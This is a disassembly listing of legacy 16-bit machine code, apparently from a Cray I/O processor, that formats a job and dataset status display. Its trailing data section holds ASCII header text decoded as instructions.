0x019B (0x000336) 0x1004- f:00010 d: 4 | A = 4 (0x0004)
0x019C (0x000338) 0x0801- f:00004 d: 1 | A = A > 1 (0x0001)
0x019D (0x00033A) 0x251F- f:00022 d: 287 | A = A + OR[287]
0x019E (0x00033C) 0x2913- f:00024 d: 275 | OR[275] = A
0x019F (0x00033E) 0x1002- f:00010 d: 2 | A = 2 (0x0002)
0x01A0 (0x000340) 0x2914- f:00024 d: 276 | OR[276] = A
0x01A1 (0x000342) 0x103B- f:00010 d: 59 | A = 59 (0x003B)
0x01A2 (0x000344) 0x2915- f:00024 d: 277 | OR[277] = A
0x01A3 (0x000346) 0x7E03-0x0239 f:00077 d: 3 | R = OR[3]+569 (0x0239)
0x01A5 (0x00034A) 0x211F- f:00020 d: 287 | A = OR[287]
0x01A6 (0x00034C) 0x140C- f:00012 d: 12 | A = A + 12 (0x000C)
0x01A7 (0x00034E) 0x2908- f:00024 d: 264 | OR[264] = A
0x01A8 (0x000350) 0x3108- f:00030 d: 264 | A = (OR[264])
0x01A9 (0x000352) 0x0808- f:00004 d: 8 | A = A > 8 (0x0008)
0x01AA (0x000354) 0x2913- f:00024 d: 275 | OR[275] = A
0x01AB (0x000356) 0x1002- f:00010 d: 2 | A = 2 (0x0002)
0x01AC (0x000358) 0x2914- f:00024 d: 276 | OR[276] = A
0x01AD (0x00035A) 0x1040- f:00010 d: 64 | A = 64 (0x0040)
0x01AE (0x00035C) 0x2915- f:00024 d: 277 | OR[277] = A
0x01AF (0x00035E) 0x744E- f:00072 d: 78 | R = P + 78 (0x01FD)
0x01B0 (0x000360) 0x211F- f:00020 d: 287 | A = OR[287]
0x01B1 (0x000362) 0x140C- f:00012 d: 12 | A = A + 12 (0x000C)
0x01B2 (0x000364) 0x2908- f:00024 d: 264 | OR[264] = A
0x01B3 (0x000366) 0x3108- f:00030 d: 264 | A = (OR[264])
0x01B4 (0x000368) 0x12FF- f:00011 d: 255 | A = A & 255 (0x00FF)
0x01B5 (0x00036A) 0x2913- f:00024 d: 275 | OR[275] = A
0x01B6 (0x00036C) 0x1002- f:00010 d: 2 | A = 2 (0x0002)
0x01B7 (0x00036E) 0x2914- f:00024 d: 276 | OR[276] = A
0x01B8 (0x000370) 0x1045- f:00010 d: 69 | A = 69 (0x0045)
0x01B9 (0x000372) 0x2915- f:00024 d: 277 | OR[277] = A
0x01BA (0x000374) 0x7443- f:00072 d: 67 | R = P + 67 (0x01FD)
0x01BB (0x000376) 0x211F- f:00020 d: 287 | A = OR[287]
0x01BC (0x000378) 0x1403- f:00012 d: 3 | A = A + 3 (0x0003)
0x01BD (0x00037A) 0x2908- f:00024 d: 264 | OR[264] = A
0x01BE (0x00037C) 0x3108- f:00030 d: 264 | A = (OR[264])
0x01BF (0x00037E) 0x1201- f:00011 d: 1 | A = A & 1 (0x0001)
0x01C0 (0x000380) 0x2913- f:00024 d: 275 | OR[275] = A
0x01C1 (0x000382) 0x2113- f:00020 d: 275 | A = OR[275]
0x01C2 (0x000384) 0x0A01- f:00005 d: 1 | A = A < 1 (0x0001)
0x01C3 (0x000386) 0x2403- f:00022 d: 3 | A = A + OR[3]
0x01C4 (0x000388) 0x1C00-0x039C f:00016 d: 0 | A = A + 924 (0x039C)
0x01C6 (0x00038C) 0x2913- f:00024 d: 275 | OR[275] = A
0x01C7 (0x00038E) 0x1003- f:00010 d: 3 | A = 3 (0x0003)
0x01C8 (0x000390) 0x2914- f:00024 d: 276 | OR[276] = A
0x01C9 (0x000392) 0x104A- f:00010 d: 74 | A = 74 (0x004A)
0x01CA (0x000394) 0x2915- f:00024 d: 277 | OR[277] = A
0x01CB (0x000396) 0x7E03-0x0239 f:00077 d: 3 | R = OR[3]+569 (0x0239)
0x01CD (0x00039A) 0x7E03-0x0277 f:00077 d: 3 | R = OR[3]+631 (0x0277)
0x01CF (0x00039E) 0x7E03-0x0291 f:00077 d: 3 | R = OR[3]+657 (0x0291)
0x01D1 (0x0003A2) 0x7017- f:00070 d: 23 | P = P + 23 (0x01E8)
0x01D2 (0x0003A4) 0x2123- f:00020 d: 291 | A = OR[291]
0x01D3 (0x0003A6) 0x8602- f:00103 d: 2 | P = P + 2 (0x01D5), A # 0
0x01D4 (0x0003A8) 0x7012- f:00070 d: 18 | P = P + 18 (0x01E6)
0x01D5 (0x0003AA) 0x2003- f:00020 d: 3 | A = OR[3]
0x01D6 (0x0003AC) 0x1C00-0x03A0 f:00016 d: 0 | A = A + 928 (0x03A0)
0x01D8 (0x0003B0) 0x2913- f:00024 d: 275 | OR[275] = A
0x01D9 (0x0003B2) 0x100B- f:00010 d: 11 | A = 11 (0x000B)
0x01DA (0x0003B4) 0x2914- f:00024 d: 276 | OR[276] = A
0x01DB (0x0003B6) 0x1023- f:00010 d: 35 | A = 35 (0x0023)
0x01DC (0x0003B8) 0x2915- f:00024 d: 277 | OR[277] = A
0x01DD (0x0003BA) 0x7E03-0x0239 f:00077 d: 3 | R = OR[3]+569 (0x0239)
0x01DF (0x0003BE) 0x7E03-0x0277 f:00077 d: 3 | R = OR[3]+631 (0x0277)
0x01E1 (0x0003C2) 0x7E03-0x0291 f:00077 d: 3 | R = OR[3]+657 (0x0291)
0x01E3 (0x0003C6) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x01E4 (0x0003C8) 0x2923- f:00024 d: 291 | OR[291] = A
0x01E5 (0x0003CA) 0x7003- f:00070 d: 3 | P = P + 3 (0x01E8)
0x01E6 (0x0003CC) 0x7E03-0x0277 f:00077 d: 3 | R = OR[3]+631 (0x0277)
0x01E8 (0x0003D0) 0x7350- f:00071 d: 336 | P = P - 336 (0x0098)
0x01E9 (0x0003D2) 0x2F04- f:00027 d: 260 | OR[260] = OR[260] - 1
0x01EA (0x0003D4) 0x3104- f:00030 d: 260 | A = (OR[260])
0x01EB (0x0003D6) 0x2904- f:00024 d: 260 | OR[260] = A
0x01EC (0x0003D8) 0x2104- f:00020 d: 260 | A = OR[260]
0x01ED (0x0003DA) 0x2706- f:00023 d: 262 | A = A - OR[262]
0x01EE (0x0003DC) 0x8007- f:00100 d: 7 | P = P + 7 (0x01F5), C = 0
0x01EF (0x0003DE) 0x2104- f:00020 d: 260 | A = OR[260]
0x01F0 (0x0003E0) 0x2705- f:00023 d: 261 | A = A - OR[261]
0x01F1 (0x0003E2) 0x8003- f:00100 d: 3 | P = P + 3 (0x01F4), C = 0
0x01F2 (0x0003E4) 0x8402- f:00102 d: 2 | P = P + 2 (0x01F4), A = 0
0x01F3 (0x0003E6) 0x7002- f:00070 d: 2 | P = P + 2 (0x01F5)
0x01F4 (0x0003E8) 0x7003- f:00070 d: 3 | P = P + 3 (0x01F7)
0x01F5 (0x0003EA) 0x7C34- f:00076 d: 52 | R = OR[52]
0x01F6 (0x0003EC) 0x000B- f:00000 d: 11 | PASS | **** non-standard encoding with D:0x000B ****
0x01F7 (0x0003EE) 0x102A- f:00010 d: 42 | A = 42 (0x002A)
0x01F8 (0x0003F0) 0x2925- f:00024 d: 293 | OR[293] = A
0x01F9 (0x0003F2) 0x1125- f:00010 d: 293 | A = 293 (0x0125)
0x01FA (0x0003F4) 0x5800- f:00054 d: 0 | B = A
0x01FB (0x0003F6) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x01FC (0x0003F8) 0x7C09- f:00076 d: 9 | R = OR[9]
0x01FD (0x0003FA) 0x2113- f:00020 d: 275 | A = OR[275]
0x01FE (0x0003FC) 0x3921- f:00034 d: 289 | (OR[289]) = A
0x01FF (0x0003FE) 0x1028- f:00010 d: 40 | A = 40 (0x0028)
0x0200 (0x000400) 0x2925- f:00024 d: 293 | OR[293] = A
0x0201 (0x000402) 0x1800-0x000F f:00014 d: 0 | A = 15 (0x000F)
0x0203 (0x000406) 0x2926- f:00024 d: 294 | OR[294] = A
0x0204 (0x000408) 0x2121- f:00020 d: 289 | A = OR[289]
0x0205 (0x00040A) 0x2927- f:00024 d: 295 | OR[295] = A
0x0206 (0x00040C) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0207 (0x00040E) 0x2928- f:00024 d: 296 | OR[296] = A
0x0208 (0x000410) 0x1010- f:00010 d: 16 | A = 16 (0x0010)
0x0209 (0x000412) 0x2929- f:00024 d: 297 | OR[297] = A
0x020A (0x000414) 0x2120- f:00020 d: 288 | A = OR[288]
0x020B (0x000416) 0x292A- f:00024 d: 298 | OR[298] = A
0x020C (0x000418) 0x2115- f:00020 d: 277 | A = OR[277]
0x020D (0x00041A) 0x292B- f:00024 d: 299 | OR[299] = A
0x020E (0x00041C) 0x1001- f:00010 d: 1 | A = 1 (0x0001)
0x020F (0x00041E) 0x292C- f:00024 d: 300 | OR[300] = A
0x0210 (0x000420) 0x2114- f:00020 d: 276 | A = OR[276]
0x0211 (0x000422) 0x292D- f:00024 d: 301 | OR[301] = A
0x0212 (0x000424) 0x1125- f:00010 d: 293 | A = 293 (0x0125)
0x0213 (0x000426) 0x5800- f:00054 d: 0 | B = A
0x0214 (0x000428) 0x1800-0x1B18 f:00014 d: 0 | A = 6936 (0x1B18)
0x0216 (0x00042C) 0x7C09- f:00076 d: 9 | R = OR[9]
0x0217 (0x00042E) 0x0200- f:00001 d: 0 | EXIT
0x0218 (0x000430) 0x2113- f:00020 d: 275 | A = OR[275]
0x0219 (0x000432) 0x3921- f:00034 d: 289 | (OR[289]) = A
0x021A (0x000434) 0x1028- f:00010 d: 40 | A = 40 (0x0028)
0x021B (0x000436) 0x2925- f:00024 d: 293 | OR[293] = A
0x021C (0x000438) 0x1800-0x0011 f:00014 d: 0 | A = 17 (0x0011)
0x021E (0x00043C) 0x2926- f:00024 d: 294 | OR[294] = A
0x021F (0x00043E) 0x2121- f:00020 d: 289 | A = OR[289]
0x0220 (0x000440) 0x2927- f:00024 d: 295 | OR[295] = A
0x0221 (0x000442) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0222 (0x000444) 0x2928- f:00024 d: 296 | OR[296] = A
0x0223 (0x000446) 0x1010- f:00010 d: 16 | A = 16 (0x0010)
0x0224 (0x000448) 0x2929- f:00024 d: 297 | OR[297] = A
0x0225 (0x00044A) 0x2120- f:00020 d: 288 | A = OR[288]
0x0226 (0x00044C) 0x292A- f:00024 d: 298 | OR[298] = A
0x0227 (0x00044E) 0x2115- f:00020 d: 277 | A = OR[277]
0x0228 (0x000450) 0x292B- f:00024 d: 299 | OR[299] = A
0x0229 (0x000452) 0x1001- f:00010 d: 1 | A = 1 (0x0001)
0x022A (0x000454) 0x292C- f:00024 d: 300 | OR[300] = A
0x022B (0x000456) 0x2114- f:00020 d: 276 | A = OR[276]
0x022C (0x000458) 0x292D- f:00024 d: 301 | OR[301] = A
0x022D (0x00045A) 0x1125- f:00010 d: 293 | A = 293 (0x0125)
0x022E (0x00045C) 0x5800- f:00054 d: 0 | B = A
0x022F (0x00045E) 0x1800-0x1B18 f:00014 d: 0 | A = 6936 (0x1B18)
0x0231 (0x000462) 0x7C09- f:00076 d: 9 | R = OR[9]
0x0232 (0x000464) 0x0200- f:00001 d: 0 | EXIT
0x0233 (0x000466) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0234 (0x000468) 0x2916- f:00024 d: 278 | OR[278] = A
0x0235 (0x00046A) 0x2116- f:00020 d: 278 | A = OR[278]
0x0236 (0x00046C) 0x2714- f:00023 d: 276 | A = A - OR[276]
0x0237 (0x00046E) 0x8439- f:00102 d: 57 | P = P + 57 (0x0270), A = 0
0x0238 (0x000470) 0x2116- f:00020 d: 278 | A = OR[278]
0x0239 (0x000472) 0x0801- f:00004 d: 1 | A = A > 1 (0x0001)
0x023A (0x000474) 0x2513- f:00022 d: 275 | A = A + OR[275]
0x023B (0x000476) 0x290D- f:00024 d: 269 | OR[269] = A
0x023C (0x000478) 0x310D- f:00030 d: 269 | A = (OR[269])
0x023D (0x00047A) 0x290D- f:00024 d: 269 | OR[269] = A
0x023E (0x00047C) 0x2116- f:00020 d: 278 | A = OR[278]
0x023F (0x00047E) 0x1201- f:00011 d: 1 | A = A & 1 (0x0001)
0x0240 (0x000480) 0x2908- f:00024 d: 264 | OR[264] = A
0x0241 (0x000482) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0242 (0x000484) 0x2708- f:00023 d: 264 | A = A - OR[264]
0x0243 (0x000486) 0x8604- f:00103 d: 4 | P = P + 4 (0x0247), A # 0
0x0244 (0x000488) 0x210D- f:00020 d: 269 | A = OR[269]
0x0245 (0x00048A) 0x0808- f:00004 d: 8 | A = A > 8 (0x0008)
0x0246 (0x00048C) 0x290D- f:00024 d: 269 | OR[269] = A
0x0247 (0x00048E) 0x210D- f:00020 d: 269 | A = OR[269]
0x0248 (0x000490) 0x12FF- f:00011 d: 255 | A = A & 255 (0x00FF)
0x0249 (0x000492) 0x2917- f:00024 d: 279 | OR[279] = A
0x024A (0x000494) 0x2D16- f:00026 d: 278 | OR[278] = OR[278] + 1
0x024B (0x000496) 0x8602- f:00103 d: 2 | P = P + 2 (0x024D), A # 0
0x024C (0x000498) 0x0200- f:00001 d: 0 | EXIT
0x024D (0x00049A) 0x2117- f:00020 d: 279 | A = OR[279]
0x024E (0x00049C) 0x1620- f:00013 d: 32 | A = A - 32 (0x0020)
0x024F (0x00049E) 0x8005- f:00100 d: 5 | P = P + 5 (0x0254), C = 0
0x0250 (0x0004A0) 0x107F- f:00010 d: 127 | A = 127 (0x007F)
0x0251 (0x0004A2) 0x2717- f:00023 d: 279 | A = A - OR[279]
0x0252 (0x0004A4) 0x8002- f:00100 d: 2 | P = P + 2 (0x0254), C = 0
0x0253 (0x0004A6) 0x7003- f:00070 d: 3 | P = P + 3 (0x0256)
0x0254 (0x0004A8) 0x1020- f:00010 d: 32 | A = 32 (0x0020)
0x0255 (0x0004AA) 0x2917- f:00024 d: 279 | OR[279] = A
0x0256 (0x0004AC) 0x2117- f:00020 d: 279 | A = OR[279]
0x0257 (0x0004AE) 0x12FF- f:00011 d: 255 | A = A & 255 (0x00FF)
0x0258 (0x0004B0) 0x290D- f:00024 d: 269 | OR[269] = A
0x0259 (0x0004B2) 0x2115- f:00020 d: 277 | A = OR[277]
0x025A (0x0004B4) 0x0801- f:00004 d: 1 | A = A > 1 (0x0001)
0x025B (0x0004B6) 0x2520- f:00022 d: 288 | A = A + OR[288]
0x025C (0x0004B8) 0x290E- f:00024 d: 270 | OR[270] = A
0x025D (0x0004BA) 0x2115- f:00020 d: 277 | A = OR[277]
0x025E (0x0004BC) 0x1201- f:00011 d: 1 | A = A & 1 (0x0001)
0x025F (0x0004BE) 0x2908- f:00024 d: 264 | OR[264] = A
0x0260 (0x0004C0) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0261 (0x0004C2) 0x2708- f:00023 d: 264 | A = A - OR[264]
0x0262 (0x0004C4) 0x8607- f:00103 d: 7 | P = P + 7 (0x0269), A # 0
0x0263 (0x0004C6) 0x310E- f:00030 d: 270 | A = (OR[270])
0x0264 (0x0004C8) 0x0A09- f:00005 d: 9 | A = A < 9 (0x0009)
0x0265 (0x0004CA) 0x250D- f:00022 d: 269 | A = A + OR[269]
0x0266 (0x0004CC) 0x0C09- f:00006 d: 9 | A = A >> 9 (0x0009)
0x0267 (0x0004CE) 0x390E- f:00034 d: 270 | (OR[270]) = A
0x0268 (0x0004D0) 0x7006- f:00070 d: 6 | P = P + 6 (0x026E)
0x0269 (0x0004D2) 0x310E- f:00030 d: 270 | A = (OR[270])
0x026A (0x0004D4) 0x1A00-0xFF00 f:00015 d: 0 | A = A & 65280 (0xFF00)
0x026C (0x0004D8) 0x250D- f:00022 d: 269 | A = A + OR[269]
0x026D (0x0004DA) 0x390E- f:00034 d: 270 | (OR[270]) = A
0x026E (0x0004DC) 0x2D15- f:00026 d: 277 | OR[277] = OR[277] + 1
0x026F (0x0004DE) 0x723A- f:00071 d: 58 | P = P - 58 (0x0235)
0x0270 (0x0004E0) 0x0200- f:00001 d: 0 | EXIT
0x0271 (0x0004E2) 0x1028- f:00010 d: 40 | A = 40 (0x0028)
0x0272 (0x0004E4) 0x2925- f:00024 d: 293 | OR[293] = A
0x0273 (0x0004E6) 0x1800-0x0123 f:00014 d: 0 | A = 291 (0x0123)
0x0275 (0x0004EA) 0x2926- f:00024 d: 294 | OR[294] = A
0x0276 (0x0004EC) 0x1800-0x0005 f:00014 d: 0 | A = 5 (0x0005)
0x0278 (0x0004F0) 0x2927- f:00024 d: 295 | OR[295] = A
0x0279 (0x0004F2) 0x211B- f:00020 d: 283 | A = OR[283]
0x027A (0x0004F4) 0x2522- f:00022 d: 290 | A = A + OR[290]
0x027B (0x0004F6) 0x2928- f:00024 d: 296 | OR[296] = A
0x027C (0x0004F8) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x027D (0x0004FA) 0x2929- f:00024 d: 297 | OR[297] = A
0x027E (0x0004FC) 0x2120- f:00020 d: 288 | A = OR[288]
0x027F (0x0004FE) 0x292A- f:00024 d: 298 | OR[298] = A
0x0280 (0x000500) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0281 (0x000502) 0x292B- f:00024 d: 299 | OR[299] = A
0x0282 (0x000504) 0x1050- f:00010 d: 80 | A = 80 (0x0050)
0x0283 (0x000506) 0x292C- f:00024 d: 300 | OR[300] = A
0x0284 (0x000508) 0x1125- f:00010 d: 293 | A = 293 (0x0125)
0x0285 (0x00050A) 0x5800- f:00054 d: 0 | B = A
0x0286 (0x00050C) 0x1800-0x1B18 f:00014 d: 0 | A = 6936 (0x1B18)
0x0288 (0x000510) 0x7C09- f:00076 d: 9 | R = OR[9]
0x0289 (0x000512) 0x2D22- f:00026 d: 290 | OR[290] = OR[290] + 1
0x028A (0x000514) 0x0200- f:00001 d: 0 | EXIT
0x028B (0x000516) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x028C (0x000518) 0x2913- f:00024 d: 275 | OR[275] = A
0x028D (0x00051A) 0x1020- f:00010 d: 32 | A = 32 (0x0020)
0x028E (0x00051C) 0x2914- f:00024 d: 276 | OR[276] = A
0x028F (0x00051E) 0x2113- f:00020 d: 275 | A = OR[275]
0x0290 (0x000520) 0x1650- f:00013 d: 80 | A = A - 80 (0x0050)
0x0291 (0x000522) 0x841B- f:00102 d: 27 | P = P + 27 (0x02AC), A = 0
0x0292 (0x000524) 0x2114- f:00020 d: 276 | A = OR[276]
0x0293 (0x000526) 0x12FF- f:00011 d: 255 | A = A & 255 (0x00FF)
0x0294 (0x000528) 0x290D- f:00024 d: 269 | OR[269] = A
0x0295 (0x00052A) 0x2113- f:00020 d: 275 | A = OR[275]
0x0296 (0x00052C) 0x0801- f:00004 d: 1 | A = A > 1 (0x0001)
0x0297 (0x00052E) 0x2520- f:00022 d: 288 | A = A + OR[288]
0x0298 (0x000530) 0x290E- f:00024 d: 270 | OR[270] = A
0x0299 (0x000532) 0x2113- f:00020 d: 275 | A = OR[275]
0x029A (0x000534) 0x1201- f:00011 d: 1 | A = A & 1 (0x0001)
0x029B (0x000536) 0x2908- f:00024 d: 264 | OR[264] = A
0x029C (0x000538) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x029D (0x00053A) 0x2708- f:00023 d: 264 | A = A - OR[264]
0x029E (0x00053C) 0x8607- f:00103 d: 7 | P = P + 7 (0x02A5), A # 0
0x029F (0x00053E) 0x310E- f:00030 d: 270 | A = (OR[270])
0x02A0 (0x000540) 0x0A09- f:00005 d: 9 | A = A < 9 (0x0009)
0x02A1 (0x000542) 0x250D- f:00022 d: 269 | A = A + OR[269]
0x02A2 (0x000544) 0x0C09- f:00006 d: 9 | A = A >> 9 (0x0009)
0x02A3 (0x000546) 0x390E- f:00034 d: 270 | (OR[270]) = A
0x02A4 (0x000548) 0x7006- f:00070 d: 6 | P = P + 6 (0x02AA)
0x02A5 (0x00054A) 0x310E- f:00030 d: 270 | A = (OR[270])
0x02A6 (0x00054C) 0x1A00-0xFF00 f:00015 d: 0 | A = A & 65280 (0xFF00)
0x02A8 (0x000550) 0x250D- f:00022 d: 269 | A = A + OR[269]
0x02A9 (0x000552) 0x390E- f:00034 d: 270 | (OR[270]) = A
0x02AA (0x000554) 0x2D13- f:00026 d: 275 | OR[275] = OR[275] + 1
0x02AB (0x000556) 0x721C- f:00071 d: 28 | P = P - 28 (0x028F)
0x02AC (0x000558) 0x0200- f:00001 d: 0 | EXIT
0x02AD (0x00055A) 0x4352- f:00041 d: 338 | C = 1, io 0522 = BZ
0x02AE (0x00055C) 0x4159- f:00040 d: 345 | C = 1, io 0531 = DN
0x02AF (0x00055E) 0x2054- f:00020 d: 84 | A = OR[84]
0x02B0 (0x000560) 0x4150- f:00040 d: 336 | C = 1, io 0520 = DN
0x02B1 (0x000562) 0x4520- f:00042 d: 288 | C = 1, IOB = DN | **** non-standard encoding with D:0x0120 ****
0x02B2 (0x000564) 0x4A4F- f:00045 d: 79 | A = A < B | **** non-standard encoding with D:0x004F ****
0x02B3 (0x000566) 0x4220- f:00041 d: 32 | C = 1, io 0040 (TI) = BZ
0x02B4 (0x000568) 0x5354- f:00051 d: 340 | A = A & B | **** non-standard encoding with D:0x0154 ****
0x02B5 (0x00056A) 0x4154- f:00040 d: 340 | C = 1, io 0524 = DN
0x02B6 (0x00056C) 0x5553- f:00052 d: 339 | A = A + B | **** non-standard encoding with D:0x0153 ****
0x02B7 (0x00056E) 0x0000- f:00000 d: 0 | PASS
0x02B8 (0x000570) 0x4652- f:00043 d: 82 | C = 1, IOB = BZ | **** non-standard encoding with D:0x0052 ****
0x02B9 (0x000572) 0x414D- f:00040 d: 333 | C = 1, io 0515 = DN
0x02BA (0x000574) 0x4500- f:00042 d: 256 | C = 1, IOB = DN | **** non-standard encoding with D:0x0100 ****
0x02BB (0x000576) 0x5449- f:00052 d: 73 | A = A + B | **** non-standard encoding with D:0x0049 ****
0x02BC (0x000578) 0x4D45- f:00046 d: 325 | A = A >> B | **** non-standard encoding with D:0x0145 ****
0x02BD (0x00057A) 0x2020- f:00020 d: 32 | A = OR[32]
0x02BE (0x00057C) 0x2020- f:00020 d: 32 | A = OR[32]
0x02BF (0x00057E) 0x2020- f:00020 d: 32 | A = OR[32]
0x02C0 (0x000580) 0x2020- f:00020 d: 32 | A = OR[32]
0x02C1 (0x000582) 0x4649- f:00043 d: 73 | C = 1, IOB = BZ | **** non-standard encoding with D:0x0049 ****
0x02C2 (0x000584) 0x454C- f:00042 d: 332 | C = 1, IOB = DN | **** non-standard encoding with D:0x014C ****
0x02C3 (0x000586) 0x4400- f:00042 d: 0 | C = 1, IOB = DN
0x02C4 (0x000588) 0x4A53- f:00045 d: 83 | A = A < B | **** non-standard encoding with D:0x0053 ****
0x02C5 (0x00058A) 0x5120- f:00050 d: 288 | A = B | **** non-standard encoding with D:0x0120 ****
0x02C6 (0x00058C) 0x2020- f:00020 d: 32 | A = OR[32]
0x02C7 (0x00058E) 0x4441- f:00042 d: 65 | C = 1, IOB = DN | **** non-standard encoding with D:0x0041 ****
0x02C8 (0x000590) 0x5441- f:00052 d: 65 | A = A + B | **** non-standard encoding with D:0x0041 ****
0x02C9 (0x000592) 0x5345- f:00051 d: 325 | A = A & B | **** non-standard encoding with D:0x0145 ****
0x02CA (0x000594) 0x5420- f:00052 d: 32 | A = A + B | **** non-standard encoding with D:0x0020 ****
0x02CB (0x000596) 0x2020- f:00020 d: 32 | A = OR[32]
0x02CC (0x000598) 0x5354- f:00051 d: 340 | A = A & B | **** non-standard encoding with D:0x0154 ****
0x02CD (0x00059A) 0x4154- f:00040 d: 340 | C = 1, io 0524 = DN
0x02CE (0x00059C) 0x5553- f:00052 d: 339 | A = A + B | **** non-standard encoding with D:0x0153 ****
0x02CF (0x00059E) 0x2020- f:00020 d: 32 | A = OR[32]
0x02D0 (0x0005A0) 0x2050- f:00020 d: 80 | A = OR[80]
0x02D1 (0x0005A2) 0x5249- f:00051 d: 73 | A = A & B | **** non-standard encoding with D:0x0049 ****
0x02D2 (0x0005A4) 0x2020- f:00020 d: 32 | A = OR[32]
0x02D3 (0x0005A6) 0x2055- f:00020 d: 85 | A = OR[85]
0x02D4 (0x0005A8) 0x5345- f:00051 d: 325 | A = A & B | **** non-standard encoding with D:0x0145 ****
0x02D5 (0x0005AA) 0x4420- f:00042 d: 32 | C = 1, IOB = DN | **** non-standard encoding with D:0x0020 ****
0x02D6 (0x0005AC) 0x2020- f:00020 d: 32 | A = OR[32]
0x02D7 (0x0005AE) 0x4C49- f:00046 d: 73 | A = A >> B | **** non-standard encoding with D:0x0049 ****
0x02D8 (0x0005B0) 0x4D49- f:00046 d: 329 | A = A >> B | **** non-standard encoding with D:0x0149 ****
0x02D9 (0x0005B2) 0x5420- f:00052 d: 32 | A = A + B | **** non-standard encoding with D:0x0020 ****
0x02DA (0x0005B4) 0x2020- f:00020 d: 32 | A = OR[32]
0x02DB (0x0005B6) 0x4C45- f:00046 d: 69 | A = A >> B | **** non-standard encoding with D:0x0045 ****
0x02DC (0x0005B8) 0x4E47- f:00047 d: 71 | A = A << B | **** non-standard encoding with D:0x0047 ****
0x02DD (0x0005BA) 0x5448- f:00052 d: 72 | A = A + B | **** non-standard encoding with D:0x0048 ****
0x02DE (0x0005BC) 0x2020- f:00020 d: 32 | A = OR[32]
0x02DF (0x0005BE) 0x2049- f:00020 d: 73 | A = OR[73]
0x02E0 (0x0005C0) 0x4420- f:00042 d: 32 | C = 1, IOB = DN | **** non-standard encoding with D:0x0020 ****
0x02E1 (0x0005C2) 0x2020- f:00020 d: 32 | A = OR[32]
0x02E2 (0x0005C4) 0x4452- f:00042 d: 82 | C = 1, IOB = DN | **** non-standard encoding with D:0x0052 ****
0x02E3 (0x0005C6) 0x2020- f:00020 d: 32 | A = OR[32]
0x02E4 (0x0005C8) 0x2044- f:00020 d: 68 | A = OR[68]
0x02E5 (0x0005CA) 0x5520- f:00052 d: 288 | A = A + B | **** non-standard encoding with D:0x0120 ****
0x02E6 (0x0005CC) 0x2020- f:00020 d: 32 | A = OR[32]
0x02E7 (0x0005CE) 0x5252- f:00051 d: 82 | A = A & B | **** non-standard encoding with D:0x0052 ****
0x02E8 (0x0005D0) 0x0000- f:00000 d: 0 | PASS
0x02E9 (0x0005D2) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x02EA (0x0005D4) 0x2D20- f:00026 d: 288 | OR[288] = OR[288] + 1
0x02EB (0x0005D6) 0x2020- f:00020 d: 32 | A = OR[32]
0x02EC (0x0005D8) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x02ED (0x0005DA) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x02EE (0x0005DC) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x02EF (0x0005DE) 0x2D20- f:00026 d: 288 | OR[288] = OR[288] + 1
0x02F0 (0x0005E0) 0x2020- f:00020 d: 32 | A = OR[32]
0x02F1 (0x0005E2) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x02F2 (0x0005E4) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x02F3 (0x0005E6) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x02F4 (0x0005E8) 0x2020- f:00020 d: 32 | A = OR[32]
0x02F5 (0x0005EA) 0x202D- f:00020 d: 45 | A = OR[45]
0x02F6 (0x0005EC) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x02F7 (0x0005EE) 0x2020- f:00020 d: 32 | A = OR[32]
0x02F8 (0x0005F0) 0x202D- f:00020 d: 45 | A = OR[45]
0x02F9 (0x0005F2) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x02FA (0x0005F4) 0x2D20- f:00026 d: 288 | OR[288] = OR[288] + 1
0x02FB (0x0005F6) 0x2020- f:00020 d: 32 | A = OR[32]
0x02FC (0x0005F8) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x02FD (0x0005FA) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x02FE (0x0005FC) 0x2D20- f:00026 d: 288 | OR[288] = OR[288] + 1
0x02FF (0x0005FE) 0x2020- f:00020 d: 32 | A = OR[32]
0x0300 (0x000600) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x0301 (0x000602) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x0302 (0x000604) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x0303 (0x000606) 0x2020- f:00020 d: 32 | A = OR[32]
0x0304 (0x000608) 0x202D- f:00020 d: 45 | A = OR[45]
0x0305 (0x00060A) 0x2D20- f:00026 d: 288 | OR[288] = OR[288] + 1
0x0306 (0x00060C) 0x2020- f:00020 d: 32 | A = OR[32]
0x0307 (0x00060E) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x0308 (0x000610) 0x2020- f:00020 d: 32 | A = OR[32]
0x0309 (0x000612) 0x202D- f:00020 d: 45 | A = OR[45]
0x030A (0x000614) 0x2D20- f:00026 d: 288 | OR[288] = OR[288] + 1
0x030B (0x000616) 0x2020- f:00020 d: 32 | A = OR[32]
0x030C (0x000618) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x030D (0x00061A) 0x0000- f:00000 d: 0 | PASS
0x030E (0x00061C) 0x532D- f:00051 d: 301 | A = A & B | **** non-standard encoding with D:0x012D ****
0x030F (0x00061E) 0x4350- f:00041 d: 336 | C = 1, io 0520 = BZ
0x0310 (0x000620) 0x5520- f:00052 d: 288 | A = A + B | **** non-standard encoding with D:0x0120 ****
0x0311 (0x000622) 0x0000- f:00000 d: 0 | PASS
